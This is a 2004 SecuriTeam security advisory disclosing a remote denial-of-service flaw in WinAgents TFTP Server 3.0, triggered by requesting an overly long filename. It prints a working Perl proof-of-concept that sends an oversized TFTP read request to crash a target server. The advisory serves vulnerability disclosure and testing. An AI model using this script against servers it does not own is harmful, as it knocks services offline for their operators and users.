[NT] WinAgents TFTP Server Remote DoS (Long Filename)

From: SecuriTeam (support_at_securiteam.com)
Date: 06/16/04

  • Next message: SecuriTeam: "[NT] VP-ASP Shopping Cart Multiple Vulnerabilities"
    To: list@securiteam.com
    Date: 16 Jun 2004 17:33:25 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      WinAgents TFTP Server Remote DoS (Long Filename)
    ------------------------------------------------------------------------

    SUMMARY

    " <http://www.winagents.com/en/products/tftp-server/index.php> WinAgents
    TFTP Server for Windows is a fully-realized TFTP server for Windows
    2000/XP. WinAgent's TFTP Server runs as a background task and doesn't
    require permanent attendance". WinAgent TFTP server contains a remotely
    exploitable condition that leads to the crashing of the server software,
    thereby a denial of service condition arises.

    DETAILS

    Vulnerable Systems:
     * WinAgent TFTP Server version 3.0

    By simply requesting a file with an overly long filename string triggers
    the remote denial-of-service condition.

    Exploit:
    A sample proof-of-concept exploit code written in Perl is provided which
    can easily be used to test for this vulnerability:
    #!/usr/bin/perl
    #
    # Remote D.O.S WinAgents TFTP Server ver 3.0
    #
    # Tftp.pl <Host>

    use IO::Socket;

    $Tftp_Port = "69";
    $FileName = "A"x1000;
    $Tftp_OP = "\x00\x01";
    $Tftp_M = "bin";
    $Buf = $Tftp_OP . $Tftp_M . $FileName ;

    if(!($ARGV[0]))
    {
     print "\nUsage: perl $0 <Host>\n" ;
     
     exit;
    }

    print "\nRemote D.O.S WinAgents TFTP Server ver 3.0 PoC\n\n\n";

    $socket = IO::Socket::INET->new(Proto => "udp") or die "Socket Error
    ..\n";
    $ipaddr = inet_aton($ARGV[0]);
    $portaddr = sockaddr_in($Tftp_Port, $ipaddr);
    send($socket, $Buf, 0, $portaddr) == length($Buf) or die "Error : Can't
    send ...\n";
    print "Server : $ARGV[0] Is Down ... \n";

    Vendor Status:
    The vendor was informed at 07.06.2004 and a fix should be out soon.
    Upgrade to the newer version.

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:gss_it@yahoo.com> Global
    Security Solution IT.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.


  • Next message: SecuriTeam: "[NT] VP-ASP Shopping Cart Multiple Vulnerabilities"

    Relevant Pages

    • [EXPL] TFTP Server for Windows Buffer Overflow (Exploit)
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... TFTP Server for Windows Buffer Overflow ... Multithreaded TFTP Server ... Server Port Ranges, Block Number Rollover for Large Files. ...
      (Securiteam)
    • [UNIX] HP Ignite-UX Information Disclosure
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... "The HP Ignite-UX application ... The HP Ignite-UX can use a TFTP server to facilitate anonymous access to ... As of version B.3.2 of the product, the make_recovery command has been ...
      (Securiteam)
    • [EXPL] Windows RRAS Stack Overflow (Exploit, MS06-025)
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... There is a remote code execution vulnerability in the Routing and Remote ... Microsoft Windows XP Service Pack 1 and Microsoft Windows XP Service ...
      (Securiteam)
    • [NEWS] Arkeia Network Backup Client Allows Unauthenticated Remote Access to Computer
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... The Arkeia Network Backup Client allows a remote ... my $class = shift; ... sub Check { ...
      (Securiteam)
    • [NT] COOL! Remote Control DoS
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... excellent remote computing system that is very easy to use. ... Remote Control 1.12 ... Control (server) component that could allow a remote attacker to crash the ...
      (Securiteam)